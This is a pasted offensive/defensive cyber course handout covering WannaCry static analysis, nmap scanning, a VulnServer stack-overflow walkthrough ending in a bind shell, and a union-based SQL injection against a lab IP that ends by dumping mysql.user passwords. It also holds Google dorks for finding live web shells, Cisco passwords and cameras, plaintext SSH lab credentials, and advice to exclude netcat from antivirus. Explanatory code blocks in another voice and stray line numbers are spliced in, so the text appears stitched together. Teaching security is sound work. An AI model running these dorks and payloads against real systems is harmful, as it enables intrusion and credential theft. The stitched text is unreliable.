Mar 16, 2020, 04:44 PM
#####################################################
#            Offensive/Defensive Cyber              #
#                  By Joe McCray                    #
#####################################################


Here are some Google hacking queries to practice.


-----------------------

big brother status green

############
# r57shell #
############
inurl:r57 intext:r57 cpu+mem+phpini+phpinfo intitle:r57shell
r57 "[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"
c99 "[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]"


#########
# Cisco #
#########
filetype:cfg intext:"enable password" cisco
inurl:"NetworkConfiguration" cisco
inurl:"ccmuser" intext:cisco
inurl:"ccmuser/logon.asp"
inurl:-cfg intext:"enable password"
inurl:"level/15/exec/-/show"
intitle:Cisco Systems, Inc VPN 3000 Concentrator


###########
# Windows #
###########
filetype:pwd inurl:"/service.pwd"
ext:ica intext:Password
ext:reg "Terminal Server Client"


###########
# Cameras #
###########
inurl:"ViewerFrame?Mode="
inurl:home/homej.html intitle:snc
inurl:home/homea.html intitle:snc
intitle:flexwatch intext:"Home page ver"
(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext:"Open Menu" Shift-Reload
intitle:"Live View / - AXIS" | inurl:view/view.sht


------------------------------------------------------------------------------------------------------------------------------------

- Here is a good set of slides for getting started with Linux:
http://www.slideshare.net/olafusimichael/linux-training-24086319


- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/


- I prefer to use Putty to SSH into my Linux host.
- You can download Putty from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into Putty:

Host Name: 107.191.39.106
protocol: ssh
port: 22
username: ocodco
password: ocodco123!!!



Indicators of Compromise (IoC)
-----------------------------

1. Modify the filesystem
2. Modify the registry - ADVAPI32.dll (persistence)
3. Modify processes/services
4. Connect to the network - WS2_32.dll


if you can't detect a registry change across 5% of your network


EDR Solution
------------

1. Static Analysis <----------------------------------------- Cloud based static analysis
Learn everything I can without actually running the file
 - Modify FS - File integrity checker
 - Modify registry
 - Modify processes/services
 - Connect to the network


2. Dynamic Analysis
Runs the file in a VM/Sandbox

################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).


The fastest thing you can do is perform static analysis.



###################
# Static Analysis #
###################

---------------------------Type This-----------------------------------

cd ~/static_analysis

file wannacry.exe

cp wannacry.exe malware.pdf

file malware.pdf

hexdump -n 2 -C wannacry.exe

----------------------------------------------------------------------

(file identifies the type from the magic bytes, not the extension, so the renamed copy is still reported as a PE executable.)

***What is '4d 5a' or 'MZ'***
-------------------------Paste this URL into Firefox-----------------------------------
http://www.garykessler.net/library/file_sigs.html
---------------------------------------------------------------------------------------


---------------------------Type This-----------------------------------
cd ~/static_analysis

objdump -x wannacry.exe

objdump -x wannacry.exe | less
 q

strings wannacry.exe

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list
----------------------------------------------------------------------



---------------------------Type This-----------------------------------
cd ~/static_analysis
pe info wannacry.exe
pe check wannacry.exe
pe dump --section text wannacry.exe
pe dump --section data wannacry.exe
pe dump --section rsrc wannacry.exe
pe dump --section reloc wannacry.exe
strings rdata | less
strings rsrc | less
strings text | less
----------------------------------------------------------------------



Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomware analysis"


Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/

- Yara Rule -


Strings:
$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
$s2 = "Wanna Decryptor" wide ascii nocase
$s3 = ".wcry" wide ascii nocase
$s4 = "WANNACRY" wide ascii nocase
$s5 = "WANACRY!" wide ascii nocase
$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase



Ok, let's look for the individual strings


---------------------------Type This-----------------------------------
cd ~/static_analysis

strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry        **** Matches $s5, hmmm.....
----------------------------------------------------------------------



####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future. This is a really good script for the basics of static analysis.

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html


This report is really good for showing some good signatures to add to the Python script.


---------------------------Type This-----------------------------------
cd ~/static_analysis

nano am.py

python3 am.py wannacry.exe
----------------------------------------------------------------------
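A small static-triage script in the spirit of the am.py this section asks you to write, added here as an example (it is not the course's am.py, and the sample bytes are constructed, so no real sample is embedded). It checks the MZ magic the hexdump step looks at, extracts ASCII and UTF-16LE strings the way `strings` does, and matches them against the WannaCry YARA strings quoted above:

```python
import re
import sys

# The YARA strings from the rule quoted above ($s6 is not listed on the page).
WANNACRY_STRINGS = {
    "$s1": "Ooops, your files have been encrypted!",
    "$s2": "Wanna Decryptor",
    "$s3": ".wcry",
    "$s4": "WANNACRY",
    "$s5": "WANACRY!",
    "$s7": "icacls . /grant Everyone:F /T /C /Q",
}

# YARA 'ascii' = plain printable runs; 'wide' = UTF-16LE (one NUL after each char).
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def file_type(data):
    """Classify by magic bytes, which is what `file` and `hexdump -n 2 -C` reveal;
    the extension is ignored, so wannacry.exe renamed to malware.pdf is still MZ."""
    if data[:2] == b"MZ":
        return "PE/DOS executable (MZ)"
    if data[:4] == b"%PDF":
        return "PDF document"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "OLE2 compound document (legacy Office)"
    return "unknown"


def extract_strings(data):
    """ASCII and UTF-16LE strings of 4+ chars, like `strings` plus the wide variant."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    found += [m.group().decode("utf-16le") for m in WIDE_RE.finditer(data)]
    return found


def match_signatures(strings):
    """Map each YARA string id to the first extracted string containing it (nocase)."""
    hits = {}
    for sid, needle in WANNACRY_STRINGS.items():
        for s in strings:
            if needle.lower() in s.lower():
                hits[sid] = s
                break
    return hits


def triage(data):
    strings = extract_strings(data)
    return {"type": file_type(data),
            "string_count": len(strings),
            "hits": match_signatures(strings)}


# Constructed sample (not malware): a fake MZ stub, one wide marker, one ASCII marker.
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 16
          + b"some padding...\x00\x00"
          + "WANACRY!".encode("utf-16le") + b"\x00\x00"
          + b"icacls . /grant Everyone:F /T /C /Q\x00")

if __name__ == "__main__":
    # Usage: python3 triage.py <file>; with no argument the constructed sample is used.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    result = triage(blob)
    print(result["type"], "-", result["string_count"], "strings")
    for sid, s in sorted(result["hits"].items()):
        print(f"  {sid} matched: {s!r}")
```

Plain `strings` misses the UTF-16LE markers that the YARA rule's `wide` keyword covers, which is why the script extracts both forms.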


#####################################################
#          Analyzing Macro Embedded Malware         #
#####################################################
---------------------------Type This-----------------------------------
cd ~/static_analysis/oledump

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v
-----------------------------------------------------------------------


- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
-----------------------------------------------------------------------



#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 1            #
#########################################
Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
                           Comfortable with basic network (Network+)
                           Comfortable with security fundamentals (Security+)


Job Task: Process security events, follow incident response triage playbook

#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 2            #
#########################################

Required Technical Skills: Comfortable with basic Linux/Windows system administration
                           Comfortable with basic network administration
                           Comfortable with basic programming
                           Comfortable researching IT security issues


Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook

#########################################
# Security Operations Center Job Roles  #
# Intrusion Analysis Level 3            #
#########################################

Required Technical Skills: Strong statistical analysis background
                           Strong programming background (C, C++, Java, Assembly, scripting languages)
                           Advanced system/network administration background
                           Comfortable researching IT security issues


Job Task: Perform detailed malware analysis
          Perform detailed statistical analysis
          Assist with development of the incident response triage playbook



-------------------------------------------------------------------------------------------------------------------------
#######################
# Passive Recon       #
# aka: OSINT          #
# aka: Footprinting   #
#######################

- Wikipedia Page
  - Are they Public or Private?
  - Does the target have any subsidiaries?
  - Have they had any scandals?

- Robtex
  - Show system map

- Sample OSINT Report:
  https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc

- Misc
  OSINT on a hacker group:
  https://en.wikipedia.org/wiki/Anonymous_(group)
  https://en.wikipedia.org/wiki/LulzSec

  OSINT on a terrorist group:
  https://en.wikipedia.org/wiki/Al-Qaeda
  https://en.wikipedia.org/wiki/Taliban
  https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant


###################################
# Fusion Cell/Threat Intelligence #
###################################


Mission/Target
--------------
- External (company hired to do threat intel for you)
  - Generic keyword searches for terms that are relevant to your organization


- Internal
  - Analyze indicators and artifacts, and distribute relevant info to appropriate business units
  - Analyze potential threat actors that may target your organization



Technical Components
--------------------

Data to analyze:
  - Feeds (who do you want to listen to?)
    https://github.com/P3t3rp4rk3r/Threat_Intelligence#sources

  - Formats (what language do you want to speak?)
    https://github.com/P3t3rp4rk3r/Threat_Intelligence#formats


- Platforms
  - How do we talk to each other and other people (email, phone, postcard)?

  Open source platforms
  https://github.com/OpenCTI-Platform/opencti


- Secure Linux OS (Qubes/Tails)
  Qubes/Tails
  https://www.fossmint.com/best-linux-distros-for-privacy-security/

- Non-attributable network
  Purchase a separate business internet connection



Sample Reports
--------------
- Reports
  https://github.com/fdiskyou/threat-INTel



APT Research
------------
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections


Threat Analysts Online tools/dashboards
---------------------------------------
https://start.me/p/rxRbpo/ti

Step 1: Download Nmap
--------------------
Windows: https://nmap.org/dist/nmap-7.70-setup.exe
Mac OS X: https://nmap.org/dist/nmap-7.70.dmg

Linux:
--- Fedora/CentOS/RHEL: sudo yum install -y nmap
--- Ubuntu/Mint/Debian: sudo apt-get install -y nmap



------------------------------------------------------------------------------------------------------------------------------



########################
# Scanning Methodology #
########################


- Ping Sweep
What's alive?
------------
Note: On Windows you won't need to use the word "sudo" in front of the command below:

---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sP 157.166.226.*
--------------------------------------------------------------------------------------------


 - If -sP yields no results try:
Note: On Windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sL 157.166.226.*
------------------------------------------------------------------------------------------


 - Look for hostnames:
Note: On Windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep cnn
-------------------------------------------------------------------------------------------


- Port Scan
What's where?
------------
Note: On Windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sS 162.243.126.247
--------------------------------------------------------------------------------------------


- Bannergrab/Version Query
What versions of software are running?
-------------------------------------
Note: On Windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sV 162.243.126.247
-------------------------------------------------------------------------------------------


Let's dig into this a little bit more:
-------------------------------------
Note: On Windows you won't need to use the word "sudo" in front of the command below:
---------------------------On Linux or Mac OS X type This-----------------------------------
sudo nmap -sV --script=http-headers 162.243.126.247 -p 80,443
-------------------------------------------------------------------------------------------


- Vulnerability Research
Look up the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/

---------------------------------------------------------------------------------------------------------------------------------


Network Penetration Testing Process (known vulnerabilities)
-----------------------------------------------------------


1. Ping Sweep:
The purpose of this step is to identify live hosts.

   nmap -sP <ip-address/ip-range>


2. Port Scan
Identify running services. We use the running services to map the network topology.

   nmap -sS <ip-address/ip-range>


3. Bannergrab
Identify the version of software running on each port.

   nmap -sV <ip-address/ip-range>


4. Vulnerability Research
Use the software version number to research and determine if it is out of date (vulnerable).

   exploit-db.com/search



Skill Level 1. Run the scanners
-------------------------------
   Nexpose
   Qualys
   Retina
   Nessus                known vulnerabilities
   OpenVas
   Foundscan
   GFI LanGuard
   NCircle


Skill Level 2. Manual vulnerability validation (known vulnerabilities)
-----------------------------------------------------------------------

   Windows  -> systeminfo
   Linux    -> dpkg -l  (Debian/Ubuntu/Mint)
               rpm -qa  (RHEL/Fedora/CentOS)

   Mac OS X -> sudo find / -iname *.app



#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
http://45.63.104.73/ExploitLab.zip
http://45.63.104.73/nc-password-is-netcat.zip <--- save this file to your c:\windows\system32 directory


- Extract the ExploitLab.zip file to your Desktop

- Go to folder on your desktop ExploitLab\2-VulnServer, and run vulnserv.exe


- Open a new command prompt and type:

---------------------------Type This-----------------------------------
nc localhost 9999
--------------------------------------------------------------------------

If you don't have netcat you can download it from here:
http://45.63.104.73/nc-password-is-netcat.zip

The file nc.zip is password protected (password is 'password'); you'll have to exclude it from your anti-virus and either add it to your PATH, or copy it to your c:\Windows\System32\ folder.


- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP is overwritten with 396F4338, which is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.


------------------------------



Skill Level 3. Identify unknown vulnerabilities
-----------------------------------------------

- App Type
------------
   Stand Alone        Client Server        Web App

   ***(vulnserv.exe is a Client Server app)***


- Input Type
-------------
   Stand Alone:    File, Keyboard, Mouse
   Client Server:  logical network port
   Web App:        Browser

   ***(vulnserv.exe listens on port 9999)***


- Map & Fuzz app entry points:
------------------------------
   - Commands   ***(vulnserv.exe takes commands)***
   - Methods
   - Verbs
   - functions
   - subroutines
   - controllers


- Isolate the crash
-------------------
App seems to reliably crash at TRUN 2100


- Calculate the distance to EIP
-------------------------------
Distance to EIP is 2006

We found that EIP was populated with the value: 396F4338
396F4338 is 8 (38), C (43), o (6F), 9 (39), so we search for 8Co9 in the non-repeating pattern

An online tool that we can use for this is:
https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
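The search for 8Co9 described above (and in 4-count-chars-to-EIP.py), worked in code as an added example that is not one of the ExploitLab scripts: it generates the same Upper/lower/digit cyclic pattern that pattern_create.rb and the online tool produce, finds where 396F4338 sits in it both by search and by closed-form triplet arithmetic, and both give 2006.

```python
import string
import struct

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Non-repeating pattern: each 3-byte triplet (Upper, lower, digit) occurs once,
    so any 4-byte window is unique up to 26*26*10*3 = 20280 bytes."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the unique pattern size")


def value_at(offset, length=3000):
    """The 32-bit little-endian value a register holds when the pattern bytes at
    `offset` land in it (what the debugger displays as EIP)."""
    return struct.unpack("<I", pattern_create(length)[offset:offset + 4])[0]


def pattern_offset(eip_value, length=3000):
    """Offset by search. 0x396F4338 is stored little-endian as 38 43 6F 39 = '8Co9',
    the string the walk-through says to look for; returns -1 when absent."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def pattern_offset_closed_form(eip_value):
    """Same answer without building the pattern: the four bytes start at one of three
    positions inside a triplet, and each case is solved by triplet arithmetic."""
    b = struct.pack("<I", eip_value).decode("ascii", errors="replace")

    def triplet_index(u, l, d):
        return (UPPER.index(u) * 26 + LOWER.index(l)) * 10 + DIGIT.index(d)

    try:
        if b[0] in UPPER:                      # U l d U'   -> first byte of triplet i
            return 3 * triplet_index(b[0], b[1], b[2])
        if b[0] in LOWER:                      # l d U' l'  -> second byte of triplet i
            base = (UPPER.index(b[2]) * 26 + LOWER.index(b[3])) * 10
            i = base - 1 if b[1] == "9" else base + DIGIT.index(b[1])
            return 3 * i + 1
        if b[0] in DIGIT:                      # d U' l' d' -> third byte of triplet i
            return 3 * triplet_index(b[1], b[2], b[3]) - 1
    except ValueError:                         # a byte outside the pattern alphabet
        pass
    return -1


if __name__ == "__main__":
    eip = 0x396F4338
    print("search:", pattern_offset(eip), "closed form:", pattern_offset_closed_form(eip))
```

For 8Co9 the closed form is triplet Co9 = (2*26 + 14)*10 + 9 = 669, and 3*669 - 1 = 2006, which is why 5-2006char-eip-check.py uses 2006 filler bytes.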


- Redirect Program Execution
----------------------------
A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
We learned that we control EAX and ESP in script 2.



- Implement Shellcode
---------------------
There are only 2 things that can go wrong with shellcode:
- Not enough space
- Bad characters




#######################################################
#     Open the following web links below as tabs      #
# For each web link answer all of the questions below #
#######################################################
https://www.exploit-db.com/exploits/46762
https://www.exploit-db.com/exploits/46070
https://www.exploit-db.com/exploits/40713
https://www.exploit-db.com/exploits/46458
https://www.exploit-db.com/exploits/40712
https://www.exploit-db.com/exploits/40714
https://www.exploit-db.com/exploits/40680
https://www.exploit-db.com/exploits/40673
https://www.exploit-db.com/exploits/40681
https://www.exploit-db.com/exploits/37731
https://www.exploit-db.com/exploits/31254
https://www.exploit-db.com/exploits/31255
https://www.exploit-db.com/exploits/27703
https://www.exploit-db.com/exploits/27277
https://www.exploit-db.com/exploits/26495
https://www.exploit-db.com/exploits/24557
https://www.exploit-db.com/exploits/39417
https://www.exploit-db.com/exploits/23243


###############################
# Class Exploit Dev Quiz Task #
###############################


EID number:

1. Vulnerable Software Info
   a- Product Name
   b- Software version
   c- Available for download


2. Target platform
   a- OS Name (ex: Windows XP)
   b- Service pack (ex: SP3)
   c- Language pack (ex: English)


3. Exploit info
   a- modules imported (ex: sys, re, os)
   b- application entry point (ex: TRUN)
   c- distance to EIP (ex: 2006)
   d- how is code redirection done (ex: JMP ESP, JMP ESI)
   e- number of NOPs (ex: 10 * \x90 = 10 NOPs)
   f- length of shellcode (ex: 368)
   g- bad characters (ex: \x0a\x00\x0d)
   h- is the target ip hard-coded
   i- what does the shellcode do (ex: bind shell, reverse shell, calc)
   j- what is the total buffer length
   k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
   l- Is this a server side or client-side exploit



#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################


Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable 'junk2'



Analysis of the training walk-through based on EID: 15689:
http://45.63.104.73/ff.zip



ff1.py
1. What does the sys module do?
2. What is sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?


ff2.py
1. Explain what lines 18 - 20 are doing.
2. What is pattern_create.rb doing and where can I find it?
3. Why can't I just double click the file to run this script?


ff3.py
1. Explain what is happening in lines 17 to 25.
2. Explain what is happening in lines 30 to 32.
3. Why is everything below line 35 commented out?


ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?


ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?


ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?


ff7.py
1. What is a tuple in python?
2. How big is the shellcode in this script?
3. Did your app crash from this script?


ff8.py
1. How big is the shellcode in this script?
2. What is try/except in python?
3. What is socket.SOCK_STREAM in Python?


ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. From what DLL did the address of the JMP ESP come?


ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?


#########################################
# Offensive Cyber Operations Job Roles  #
# Offensive Cyber Level 1               #
#########################################
Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
                           Comfortable with basic network (Network+)
                           Comfortable with security fundamentals (Security+)


Job Task: Run network security scanners and assist with documentation of known vulnerabilities


Tools Used:
   Nmap
   Nexpose
   Qualys
   Retina
   Nessus                known vulnerabilities
   OpenVas
   Foundscan
   GFI LanGuard
   NCircle


#########################################
# Offensive Cyber Operations Job Roles  #
# Offensive Cyber Level 2               #
#########################################
Required Technical Skills: Comfortable with basic Linux/Windows system administration
                           Comfortable with basic network administration
                           Comfortable with basic programming
                           Comfortable researching IT security issues


Job Task: Run network security scanners and assist with documentation of known vulnerabilities
          Perform manual vulnerability validation
          Analyze public exploits and develop threat analysis reports
          Assess simple applications for vulnerabilities


#########################################
# Offensive Cyber Operations Job Roles  #
# Offensive Cyber Level 3               #
#########################################

Required Technical Skills: Strong programming background (C, C++, Java, Assembly, scripting languages)
                           Advanced system/network administration background
                           Comfortable researching IT security issues


Job Task: Perform manual vulnerability validation
          Analyze public exploits and develop threat analysis reports
          Assess complex applications for vulnerabilities



##################################
# Basic: Web Application Testing #
##################################

Most people are going to tell you to reference the OWASP Testing Guide.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.


The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.

   1. Does the website talk to a DB?
      - Look for parameter passing (ex: site.com/page.php?id=4)
      - If yes - try SQL Injection

   2. Can I or someone else see what I type?
      - If yes - try XSS

   3. Does the page reference a file?
      - If yes - try LFI/RFI

Let's start with some manual testing against 45.63.104.73


#######################
# Attacking PHP/MySQL #
#######################

Go to LAMP Target homepage
http://45.63.104.73/


Clicking on the Acer Link:
http://45.63.104.73/acre2.php?lap=acer

   - Found parameter passing (answer yes to question 1)
   - Insert ' to test for SQLI

---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer'

-----------------------------------------------------------------------

Page returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1


In order to perform union-based SQL injection we must first determine the number of columns in this query.
We do this using ORDER BY: ordering by a column number higher than the column count produces an error, so we narrow the number down until it stops erroring.

---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '100' in 'order clause'


---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '50' in 'order clause'


---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '25' in 'order clause'


---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
-----------------------------------------------------------------------

Page returns the following error:
Unknown column '12' in 'order clause'


---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
-----------------------------------------------------------------------

---Valid page returned for 5 and 6...error on 7, so we know there are 6 columns


Now we build out the union all select statement with the correct number of columns

Reference:
http://www.techonthenet.com/sql/union.php


---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
-----------------------------------------------------------------------


Now we negate the parameter value 'acer' by turning it into the word 'null', so only the union's rows are displayed:
---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
-----------------------------------------------------------------------

We see that a 4 and a 5 are on the screen. These are the columns that will echo back data.


Use a cheat sheet for syntax:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

---------------------------Type This-----------------------------------

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +

http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +


http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a

-----------------------------------------------------------------------
1129-----------------------------------------------------------------------
1130
1131
1132
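To see why the order-by and union-all probes above behave the way they do, and what closes the hole, here is an added Python example. It is not part of the course material and not the code behind acre2.php: it loads a constructed six-column laptops table into an in-memory SQLite database, runs the lab's lap parameter through a string-concatenated query and through a parameterized one, and shows that only the concatenated version lets the injected row reach the two echoed columns or leak a column-count error. The table layout, the column names, and the assumption that columns 4 and 5 are the ones the page renders are all mine; SQLite stands in for MySQL, so the error text differs from the 'Unknown column' message above.

```python
import sqlite3

# Constructed stand-in for the lab's backend table. Six columns, matching the
# "order by 6" result above; which columns the page renders is an assumption.
SCHEMA = """
CREATE TABLE laptops (
    id          INTEGER PRIMARY KEY,
    brand       TEXT,
    model       TEXT,
    name        TEXT,
    description TEXT,
    price       REAL
);
INSERT INTO laptops VALUES (1, 'acer', 'aspire-5', 'Aspire 5', 'Budget 15-inch laptop', 499.0);
INSERT INTO laptops VALUES (2, 'acer', 'swift-3',  'Swift 3',  'Thin and light',        749.0);
INSERT INTO laptops VALUES (3, 'dell', 'xps-13',   'XPS 13',   'Premium ultrabook',    1199.0);
"""

COLUMNS = "id, brand, model, name, description, price"


def open_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, lap):
    """Mirrors the bug in the lab page: the ?lap= value is spliced into the SQL text.
    A quote in the value ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT {COLUMNS} FROM laptops WHERE brand = '{lap}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, lap):
    """The fix: the value is bound through a placeholder and is never parsed as SQL."""
    sql = f"SELECT {COLUMNS} FROM laptops WHERE brand = ?"
    return conn.execute(sql, (lap,)).fetchall()


def echoed_fields(rows):
    """The page template only renders the 4th and 5th columns (assumed: name, description)."""
    return [(row[3], row[4]) for row in rows]


def vulnerable_error(conn, lap):
    """Return the database error text the vulnerable query would leak, or None.
    Showing this text to the client is what makes the 'order by N' probe informative."""
    try:
        lookup_vulnerable(conn, lap)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = open_db()
    probe = "null' union all select 1,2,3,4,5,6-- +"
    print("vulnerable   :", echoed_fields(lookup_vulnerable(db, probe)))  # the injected 4 and 5
    print("parameterized:", lookup_parameterized(db, probe))             # no rows at all
    print("order by 7   :", vulnerable_error(db, "acer' order by 7-- +"))
```

The parameterized query treats the whole string as a brand name, so the same payload matches no rows and the ORDER BY clause never reaches the parser. Not echoing database error text to the client is the other half of the fix: the string returned by vulnerable_error() is exactly what the walkthrough above reads off the page to count columns.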


########################
# Question I get a lot #
########################
Sometimes students ask about the "-- j" or "-- +" that I append to the SQL injection attack string.

Here is a good reference for it:
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments

